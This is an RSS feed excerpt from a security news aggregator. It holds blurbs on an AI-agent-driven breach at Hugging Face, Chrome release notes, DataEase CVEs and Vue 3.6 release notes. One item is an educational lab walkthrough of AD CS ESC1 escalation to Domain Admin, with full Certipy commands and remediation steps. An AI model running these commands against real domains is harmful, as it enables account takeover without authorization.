<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-huggingface-dataset-agent-breach.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-huggingface-dataset-agent-breach.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-huggingface-dataset-agent-breach-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-huggingface-dataset-agent-breach-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-huggingface-dataset-agent-breach-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-huggingface-dataset-agent-breach-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-huggingface-dataset-agent-breach-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">NEW YORK / LONDON (IT BOLTWISE) – Hugging Face meldet, dass ein autonom agierendes KI-System seine Produktion angegriffen hat. Laut dem Unternehmen nutzte der Angreifer dabei nicht nur eine einzelne Schwachstelle, sondern setzte den Einstieg über den Datenverarbeitungs-Pipeline-Workflow um. Betroffen waren ein begrenzter Satz interner Datensätze und mehrere Zugangsdaten, während öffentliche Modelle und User-Services nach […]</p>
<div><a href="https://www.it-boltwise.de/hugging-face-ki-agent-angriff-ueber-dataset-loader-und-template-injection.html">... den vollständigen Artikel <strong>»Hugging Face: KI-Agent-Angriff über Dataset-Loader und Template Injection«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/hugging-face-ki-agent-angriff-ueber-dataset-loader-und-template-injection.html">Hugging Face: KI-Agent-Angriff über Dataset-Loader und Template Injection</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome for Android Update]]></title>
<description><![CDATA[   Hi, everyone! We've just released Chrome 150 (150.0.7871.124) for Android. It'll become available on Google Play over the next few days. This release includes stability and performance improvements. You can see a full list of the changes in the Git log. If you find a new issue, please let us k...]]></description>
<link>https://tsecurity.de/de/3678853/it-security-nachrichten/chrome-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678853/it-security-nachrichten/chrome-for-android-update/</guid>
<pubDate>Sun, 19 Jul 2026 06:07:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>   Hi, everyone! We've just released <b>Chrome 150 (150.0.7871.124)</b> for Android. It'll become <a href="https://play.google.com/store/apps/details?id=com.android.chrome">available on Google Play</a> over the next few days. </p><p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.63..150.0.7871.114?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><div><br></div><div>Android releases contain the same security fixes as their corresponding<a href="https://chromereleases.googleblog.com/2026/07/stable-channel-update-for-desktop_0353146366.html"> Desktop releases</a> (Windows &amp; Mac: 150.0.7871.124/125, Linux: 150.0.7871.124) unless otherwise noted.</div><div><div><br></div><div><div>Krishna Govind</div><div><a href="https://www.google.com/chrome/">Google Chrome</a></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for Android Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Beta 151 (151.0.7922.29) for Android. It's now available on Google Play.You can see a partial list of the changes in the Git log. For details on new features, check out the Chromium blog, and for details on web platform updates, check here.If you find a new...]]></description>
<link>https://tsecurity.de/de/3678851/it-security-nachrichten/chrome-beta-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678851/it-security-nachrichten/chrome-beta-for-android-update/</guid>
<pubDate>Sun, 19 Jul 2026 06:07:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Beta 151 (151.0.7922.29) for Android. It's now available on <a href="https://play.google.com/store/apps/details?id=com.chrome.beta">Google Play</a>.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/151.0.7922.18..151.0.7922.29?pretty=fuller&amp;n=10000">Git log</a>. For details on new features, check out the <a href="https://blog.chromium.org/">Chromium blog</a>, and for details on web platform updates, check <a href="https://www.chromestatus.com/features#milestone%3D151">here</a>.</p><p>If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for iOS Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Beta 151 (151.0.7922.26) for iOS; it'll become available on App Store in the next few days.You can see a partial list of the changes in the Git log. If you find a new issue, please let us know by filing a bug.Chrome Release TeamGoogle Chrome]]></description>
<link>https://tsecurity.de/de/3678850/it-security-nachrichten/chrome-beta-for-ios-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678850/it-security-nachrichten/chrome-beta-for-ios-update/</guid>
<pubDate>Sun, 19 Jul 2026 06:07:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Beta 151 (151.0.7922.26) for iOS; it'll become available on App Store in the next few days.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/151.0.7922.17..151.0.7922.26?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=iOS%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Stable for iOS Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Stable 151 (151.0.7922.25) for iOS; it'll become available on App Store in the next few hours.This release includes stability and performance improvements. You can see a full list of the changes in the Git log. If you find a new issue, please let us know by...]]></description>
<link>https://tsecurity.de/de/3678849/it-security-nachrichten/chrome-stable-for-ios-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678849/it-security-nachrichten/chrome-stable-for-ios-update/</guid>
<pubDate>Sun, 19 Jul 2026 06:07:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Stable 151 (151.0.7922.25) for iOS; it'll become available on App Store in the next few hours.</p><p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.113..151.0.7922.25?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=iOS%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome for Android Update]]></title>
<description><![CDATA[ Hello Everyone! We've just released Chrome 151 (151.0.7922.29) for Android to a small percentage of users. It'll become available on Google Play over the next few days. You can find more details about early Stable releases here.This release includes stability and performance improvements. You ca...]]></description>
<link>https://tsecurity.de/de/3678847/it-security-nachrichten/chrome-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678847/it-security-nachrichten/chrome-for-android-update/</guid>
<pubDate>Sun, 19 Jul 2026 06:07:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p> Hello Everyone! We've just released Chrome 151 (151.0.7922.29) for Android to a small percentage of users. It'll become <a href="https://play.google.com/store/apps/details?id=com.android.chrome">available on Google Play</a> over the next few days. You can find more details about early Stable releases <a href="https://developer.chrome.com/blog/early-stable/">here</a>.</p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.124..151.0.7922.29?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.<br><br>Harry Souders<br><a href="https://www.google.com/chrome/">Google Chrome</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Dev for Android Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Dev 152 (152.0.7951.0) for Android. It's now available on Google Play.You can see a partial list of the changes in the Git log. For details on new features, check out the Chromium blog, and for details on web platform updates, check here.If you find a new i...]]></description>
<link>https://tsecurity.de/de/3678845/it-security-nachrichten/chrome-dev-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678845/it-security-nachrichten/chrome-dev-for-android-update/</guid>
<pubDate>Sun, 19 Jul 2026 06:07:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Dev 152 (152.0.7951.0) for Android. It's now available on <a href="https://play.google.com/store/apps/details?id=com.chrome.dev">Google Play</a>.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/152.0.7940.2..152.0.7951.0?pretty=fuller&amp;n=10000">Git log</a>. For details on new features, check out the <a href="https://blog.chromium.org/">Chromium blog</a>, and for details on web platform updates, check <a href="https://www.chromestatus.com/features#milestone%3D152">here</a>.</p><p>If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome for Android Update]]></title>
<description><![CDATA[    Hi, everyone! We've just released Chrome 150 (150.0.7871.128) for Android. It'll become available on Google Play over the next few days. This release includes stability and performance improvements. You can see a full list of the changes in the Git log. If you find a new issue, please let us ...]]></description>
<link>https://tsecurity.de/de/3678842/it-security-nachrichten/chrome-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678842/it-security-nachrichten/chrome-for-android-update/</guid>
<pubDate>Sun, 19 Jul 2026 06:07:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>    Hi, everyone! We've just released <b>Chrome 150 (150.0.7871.128)</b> for Android. It'll become <a href="https://play.google.com/store/apps/details?id=com.android.chrome">available on Google Play</a> over the next few days. </p><p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.124..150.0.7871.128?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><div><br></div><div>Android releases contain the same security fixes as their corresponding<a href="https://chromereleases.googleblog.com/2026/07/stable-channel-update-for-desktop_049796704.html"> Desktop releases</a> (Windows &amp; Mac: 150.0.7871.128/129, Linux: 150.0.7871.128) unless otherwise noted.</div><div><div><br></div><div><div>Krishna Govind</div><div><a href="https://www.google.com/chrome/">Google Chrome</a></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hugging Face Confirms AI-Driven Breach: Attackers used Autonomous Agents, defenders countered with AI]]></title>
<description><![CDATA[Hugging Face disclosed this week that it detected and contained a production infrastructure intrusion, driven end-to-end by an autonomous AI agent system, and defended against it using its own AI-based forensic analysis. The attackers exploited two code-execution flaws in Hugging Face’s dataset p...]]></description>
<link>https://tsecurity.de/de/3678343/it-security-nachrichten/hugging-face-confirms-ai-driven-breach-attackers-used-autonomous-agents-defenders-countered-with-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678343/it-security-nachrichten/hugging-face-confirms-ai-driven-breach-attackers-used-autonomous-agents-defenders-countered-with-ai/</guid>
<pubDate>Sat, 18 Jul 2026 19:53:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hugging Face disclosed this week that it detected and contained a production infrastructure intrusion, driven end-to-end by an autonomous AI agent system, and defended against it using its own AI-based forensic analysis. The attackers exploited two code-execution flaws in Hugging Face’s dataset processing pipeline: a remote-code dataset loader and a template-injection vulnerability in dataset configuration. […]</p>
<p>The post <a href="https://cybersecuritynews.com/hugging-face-confirms-ai-driven-breach/">Hugging Face Confirms AI-Driven Breach: Attackers used Autonomous Agents, defenders countered with AI</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How I Escalated to Domain Admin Using AD CS (And How to Fix It)]]></title>
<description><![CDATA[What is AD CS?Active Directory Certificate Services (AD CS) allows users and computers to obtain certificates for authentication, encryption, and other services.If certificate templates are misconfigured, attackers can request certificates for other users, including Domain Administrators, leading...]]></description>
<link>https://tsecurity.de/de/3677784/hacking/how-i-escalated-to-domain-admin-using-ad-cs-and-how-to-fix-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677784/hacking/how-i-escalated-to-domain-admin-using-ad-cs-and-how-to-fix-it/</guid>
<pubDate>Sat, 18 Jul 2026 11:39:17 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IwcmPEl9c14DK-2hWY1W1g.png"></figure><h3>What is AD CS?</h3><p><strong>Active Directory Certificate Services (AD CS)</strong> allows users and computers to obtain certificates for authentication, encryption, and other services.</p><p>If certificate templates are misconfigured, attackers can request certificates for <strong>other users</strong>, including <strong>Domain Administrators</strong>, leading to privilege escalation.</p><p>In this lab, I exploited an <strong>ESC1</strong> certificate template misconfiguration.</p><h3>Lab Setup</h3><ul><li><strong>Domain:</strong> LAB.LOCAL</li><li><strong>Domain Controller:</strong> 192.168.56.104</li><li><strong>Certificate Authority:</strong> lab-DC1-CA</li><li><strong>Attacker:</strong> bob</li></ul><h3>Step 1 — Enumerate AD CS</h3><p>First, I looked for vulnerable certificate templates using <strong>Certipy</strong>.</p><pre>certipy-ad find -u bob@lab.local -p 'password@123' -dc-ip 192.168.56.104 -dc-host DC1.lab.local -target DC1.lab.local -ldap-scheme ldap -vulnerable -debug</pre><p>Certipy identified a vulnerable template named:</p><pre>ESC1-Lab</pre><p>This template allowed the requester to specify an arbitrary <strong>User Principal Name (UPN)</strong>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*MMCsemUil50u2bqrh-1jHA.png"></figure><h3>Step 2 — Request an Administrator Certificate</h3><p>Since the template was vulnerable, I requested a certificate while impersonating the <strong>Administrator</strong> account.</p><pre>certipy-ad req -u bob@lab.local -p 'Password@123' -ca lab-DC1-CA -template ESC1-Lab -upn Administrator@lab.local -dc-ip 192.168.56.104</pre><p>Certipy successfully issued an <strong>Administrator certificate</strong> and saved it as:</p><pre>administrator.pfx</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-_feIP7X-uB2A68CtwlfQA.png"></figure><h3>Step 3 — Authenticate as Administrator</h3><p>Finally, I authenticated using the issued certificate.</p><pre>certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.56.104</pre><p>Authentication succeeded, allowing me to impersonate the <strong>Domain Administrator</strong> without ever knowing the Administrator’s password.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*vh8aenq802cDnuJT2GG2rQ.png"></figure><h3>Why Did This Work?</h3><p>The certificate template was vulnerable to <strong>ESC1</strong> because it:</p><ul><li>Allowed users to enroll.</li><li>Allowed the requester to supply any UPN.</li><li>Was trusted for client authentication.</li></ul><p>This meant Bob could request a certificate for <strong>Administrator@lab.local</strong> and authenticate as that user.</p><h3>How to Fix It</h3><p>To prevent ESC1 attacks:</p><p>1.Disable <strong>“Supply in the request”</strong> unless absolutely necessary.</p><p>2. Restrict enrollment permissions to trusted users.</p><p>3. Review certificate templates regularly.</p><p>4. Remove unnecessary Client Authentication EKUs.</p><p>5. Audit AD CS with tools like <strong>Certipy</strong> and <strong>BloodHound</strong>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1022/1*nXg7Fgi0SkhyFf5sYadGyg.png"></figure><h3>Verify the Fix</h3><p>Run the enumeration again.</p><pre>certipy-ad find -u bob@lab.local -p 'password@123' -dc-ip 192.168.56.104 -vulnerable</pre><p>If the template is properly secured, <strong>ESC1-Lab</strong> should no longer appear as vulnerable.</p><h3>Key Takeaways</h3><p>1. Regularly audit AD CS templates.</p><p>2. Follow the principle of least privilege.</p><p>3. Restrict certificate enrollment permissions.</p><p>4. Monitor certificate enrollment events.</p><blockquote><strong><em>Disclaimer:</em></strong><em> This article is part of my Active Directory Lab Series. All demonstrations were performed in my self-hosted GOAD lab for educational and defensive purposes. Never perform these techniques on systems without proper authorization.</em></blockquote><p><em>— Written by</em></p><p><strong>Aruvasaga Chithan A</strong></p><p><strong>Ethical Hacker &amp; Cyber Security Researcher.</strong></p><p><strong>Thanks for reading — your support keeps me writing.</strong><br><strong>See you in the next article…</strong></p><p><a href="http://www.linkedin.com/in/aruvasaga-chithan"><em>Linkedin</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=a86cc69aed5a" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/how-i-escalated-to-domain-admin-using-ad-cs-and-how-to-fix-it-a86cc69aed5a">How I Escalated to Domain Admin Using AD CS (And How to Fix It)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-49867 | DataEase up to 2.10.22 Template Management save saveFilesToServe staticResource cross site scripting (EUVD-2026-44786)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in DataEase up to 2.10.22. Impacted is the function saveFilesToServe of the file /de2api/templateManage/save of the component Template Management. Performing a manipulation of the argument staticResource results in cross site scripting.
...]]></description>
<link>https://tsecurity.de/de/3677631/sicherheitsluecken/cve-2026-49867-dataease-up-to-21022-template-management-save-savefilestoserve-staticresource-cross-site-scripting-euvd-2026-44786/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677631/sicherheitsluecken/cve-2026-49867-dataease-up-to-21022-template-management-save-savefilestoserve-staticresource-cross-site-scripting-euvd-2026-44786/</guid>
<pubDate>Sat, 18 Jul 2026 09:38:56 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/dataease">DataEase up to 2.10.22</a>. Impacted is the function <code>saveFilesToServe</code> of the file <em>/de2api/templateManage/save</em> of the component <em>Template Management</em>. Performing a manipulation of the argument <em>staticResource</em> results in cross site scripting.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-49867">CVE-2026-49867</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-45419 | DataEase up to 2.10.22 Template Manage save staticResource name path traversal (EUVD-2026-44777)]]></title>
<description><![CDATA[A vulnerability was found in DataEase up to 2.10.22. It has been rated as critical. Affected by this vulnerability is the function Save of the file /de2api/templateManage/save of the component Template Manage. The manipulation of the argument staticResource name leads to path traversal.

This vul...]]></description>
<link>https://tsecurity.de/de/3677624/sicherheitsluecken/cve-2026-45419-dataease-up-to-21022-template-manage-save-staticresource-name-path-traversal-euvd-2026-44777/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677624/sicherheitsluecken/cve-2026-45419-dataease-up-to-21022-template-manage-save-staticresource-name-path-traversal-euvd-2026-44777/</guid>
<pubDate>Sat, 18 Jul 2026 09:38:47 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/dataease">DataEase up to 2.10.22</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this vulnerability is the function <code>Save</code> of the file <em>/de2api/templateManage/save</em> of the component <em>Template Manage</em>. The manipulation of the argument <em>staticResource name</em> leads to path traversal.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-45419">CVE-2026-45419</a>. It is possible to initiate the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[v3.6.0-rc.1]]></title>
<description><![CDATA[Vue 3.6 is now entering the RC phase as we have completed the intended feature set for Vapor Mode.
3.6 also includes a major refactor of @vue/reactivity based on alien-signals, which significantly improves the reactivity system's performance and memory usage.
For more details about Vapor Mode, se...]]></description>
<link>https://tsecurity.de/de/3677302/downloads/v360-rc1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677302/downloads/v360-rc1/</guid>
<pubDate>Sat, 18 Jul 2026 03:16:24 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Vue 3.6 is now entering the RC phase as we have completed the intended feature set for Vapor Mode.</p>
<p>3.6 also includes a major refactor of <code>@vue/reactivity</code> based on <a href="https://github.com/stackblitz/alien-signals">alien-signals</a>, which significantly improves the reactivity system's performance and memory usage.</p>
<p>For more details about Vapor Mode, see the <a href="https://github.com/vuejs/core/releases/tag/v3.6.0-rc.1#about-vapor-mode">About Vapor Mode</a> section later in this release note.</p>
<h3>Bug Fixes</h3>
<ul>
<li><strong>hydration:</strong> avoid resolving inherited fallback in forwarded slots (<a href="https://github.com/vuejs/core/commit/4c215b5bd293e18f3a4c62b627a7696016afb982">4c215b5</a>)</li>
<li><strong>hydration:</strong> remove adopted SSR DOM for unresolved async setup (<a href="https://github.com/vuejs/core/commit/3859af4066edeba647e886decb9b4737d7f371cc">3859af4</a>)</li>
<li><strong>runtime-vapor:</strong> avoid patching invalid VNode slot content (<a href="https://github.com/vuejs/core/commit/25f5a8ae6ed3df9c4e3fbaed0da32ce0466c5612">25f5a8a</a>)</li>
<li><strong>runtime-vapor:</strong> clean up detached slot branches (<a href="https://github.com/vuejs/core/commit/b41009d41b21c98174b214eebd271d456215d177">b41009d</a>)</li>
<li><strong>runtime-vapor:</strong> defer slot content anchors during hydration (<a href="https://github.com/vuejs/core/commit/9b9e4bd6efdbce7de258d27e88155bff657d6ae9">9b9e4bd</a>)</li>
<li><strong>runtime-vapor:</strong> preserve outer pending slot anchors (<a href="https://github.com/vuejs/core/commit/4af4bf92a46426631ed6323e542227855b2fc86f">4af4bf9</a>)</li>
<li><strong>runtime-vapor:</strong> preserve slot content anchors during mismatch recovery (<a href="https://github.com/vuejs/core/commit/26f90b58977ee84569b5599700dbe9e864c880a4">26f90b5</a>)</li>
<li><strong>runtime-vapor:</strong> preserve v-show transition on vdom child (<a href="https://github.com/vuejs/core/issues/15074" data-hovercard-type="pull_request" data-hovercard-url="/vuejs/core/pull/15074/hovercard">#15074</a>) (<a href="https://github.com/vuejs/core/commit/fe882c93bb3ec37772126de1cb5c646edb56ace4">fe882c9</a>), closes <a href="https://github.com/vuejs/core/issues/15073" data-hovercard-type="issue" data-hovercard-url="/vuejs/core/issues/15073/hovercard">#15073</a></li>
<li><strong>runtime-vapor:</strong> preserve vapor slot owner during interop slot dry run (<a href="https://github.com/vuejs/core/issues/15031" data-hovercard-type="pull_request" data-hovercard-url="/vuejs/core/pull/15031/hovercard">#15031</a>) (<a href="https://github.com/vuejs/core/commit/340630ea37388e12f176a11cadcbdfe8e55e5912">340630e</a>)</li>
<li><strong>runtime-vapor:</strong> preserve VNode anchors in dynamic component hydration (<a href="https://github.com/vuejs/core/commit/898e2ca2441ea3ac064f3b38db47a0aa1b7a556d">898e2ca</a>)</li>
<li><strong>runtime-vapor:</strong> remove unsafe slot dry runs from vdom interop (<a href="https://github.com/vuejs/core/issues/15089" data-hovercard-type="pull_request" data-hovercard-url="/vuejs/core/pull/15089/hovercard">#15089</a>) (<a href="https://github.com/vuejs/core/commit/3d42cdf380b23da000de0ff9d6c3de5d77e0b0d1">3d42cdf</a>), closes <a href="https://github.com/vuejs/core/issues/14793" data-hovercard-type="pull_request" data-hovercard-url="/vuejs/core/pull/14793/hovercard">#14793</a></li>
<li><strong>runtime-vapor:</strong> reuse hydration anchor candidates (<a href="https://github.com/vuejs/core/commit/06778e705aa87e35f6058c575c562c355a365523">06778e7</a>)</li>
<li><strong>vapor:</strong> handle v-if and v-show on transition roots (<a href="https://github.com/vuejs/core/issues/15069" data-hovercard-type="pull_request" data-hovercard-url="/vuejs/core/pull/15069/hovercard">#15069</a>) (<a href="https://github.com/vuejs/core/commit/8f62f2e57519dcb80c9b3b42588c77ee6d2b0a2f">8f62f2e</a>), closes <a href="https://github.com/vuejs/core/issues/15068" data-hovercard-type="issue" data-hovercard-url="/vuejs/core/issues/15068/hovercard">#15068</a></li>
</ul>
<h2>About Vapor Mode</h2>
<p>Vapor Mode is a new compilation mode for Vue Single-File Components (SFCs) with the goal of reducing baseline bundle size and improving performance.</p>
<p>It is 100% opt-in and supports a subset of existing Vue APIs with mostly identical behavior. Features that depend on VNodes or the component public instance proxy are not available in Vapor components.</p>
<p>Vapor Mode has demonstrated the same level of performance as Solid and Svelte 5 in <a href="https://github.com/krausest/js-framework-benchmark">third-party benchmarks</a>.</p>
<h3>General Stability Notes</h3>
<p>Vapor Mode is feature-complete in Vue 3.6 RC. For now, we recommend using it in the following cases:</p>
<ul>
<li>Partial usage in existing apps, such as implementing a performance-sensitive page in Vapor Mode.</li>
<li>Building small new apps entirely in Vapor Mode.</li>
</ul>
<h2>Opting In to Vapor Mode</h2>
<p>Vapor Mode supports template-only SFCs and SFCs using <code>&lt;script setup&gt;</code>; the Options API is not supported. The following forms are supported:</p>
<div class="highlight highlight-text-html-vue notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="&lt;script setup vapor&gt;
// ...
&lt;/script&gt;"><pre>&lt;<span class="pl-ent">script</span> setup vapor&gt;<span class="pl-s1"></span>
<span class="pl-s1"><span class="pl-c"><span class="pl-c">//</span> ...</span></span>
<span class="pl-s1"></span>&lt;/<span class="pl-ent">script</span>&gt;</pre></div>
<p><code>&lt;script vapor&gt;</code> is shorthand for <code>&lt;script setup vapor&gt;</code>:</p>
<div class="highlight highlight-text-html-vue notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="&lt;script vapor&gt;
// ...
&lt;/script&gt;"><pre>&lt;<span class="pl-ent">script</span> vapor&gt;<span class="pl-s1"></span>
<span class="pl-s1"><span class="pl-c"><span class="pl-c">//</span> ...</span></span>
<span class="pl-s1"></span>&lt;/<span class="pl-ent">script</span>&gt;</pre></div>
<p>The <code>vapor</code> marker can also be placed on the template, enabling Vapor compilation for the entire SFC:</p>
<div class="highlight highlight-text-html-vue notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="&lt;template vapor&gt;
  <!-- ... -->
&lt;/template&gt;"><pre>&lt;<span class="pl-ent">template</span> vapor&gt;
  <span class="pl-c"><span class="pl-c">&lt;!--</span> ... <span class="pl-c">--&gt;</span></span>
&lt;/<span class="pl-ent">template</span>&gt;</pre></div>
<h2>Creating an App and Using VDOM Interop</h2>
<h3>Pure Vapor Applications</h3>
<p>Applications composed entirely of Vapor components can use <code>createVaporApp()</code>:</p>
<div class="highlight highlight-source-js notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="import { createVaporApp } from 'vue'
import App from './App.vue'

createVaporApp(App).mount('#app')"><pre><span class="pl-k">import</span> <span class="pl-kos">{</span> <span class="pl-s1">createVaporApp</span> <span class="pl-kos">}</span> <span class="pl-k">from</span> <span class="pl-s">'vue'</span>
<span class="pl-k">import</span> <span class="pl-v">App</span> <span class="pl-k">from</span> <span class="pl-s">'./App.vue'</span>

<span class="pl-en">createVaporApp</span><span class="pl-kos">(</span><span class="pl-v">App</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">mount</span><span class="pl-kos">(</span><span class="pl-s">'#app'</span><span class="pl-kos">)</span></pre></div>
<p>Apps created this way avoid pulling in the Virtual DOM runtime code and allow the baseline bundle size to be drastically reduced.</p>
<h3>Enabling VDOM Interop</h3>
<p>To use Vapor components in a VDOM app instance created via <code>createApp()</code>, the <code>vaporInteropPlugin</code> must be installed:</p>
<div class="highlight highlight-source-js notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="import { createApp, vaporInteropPlugin } from 'vue'
import App from './App.vue'

createApp(App).use(vaporInteropPlugin).mount('#app')"><pre><span class="pl-k">import</span> <span class="pl-kos">{</span> <span class="pl-s1">createApp</span><span class="pl-kos">,</span> <span class="pl-s1">vaporInteropPlugin</span> <span class="pl-kos">}</span> <span class="pl-k">from</span> <span class="pl-s">'vue'</span>
<span class="pl-k">import</span> <span class="pl-v">App</span> <span class="pl-k">from</span> <span class="pl-s">'./App.vue'</span>

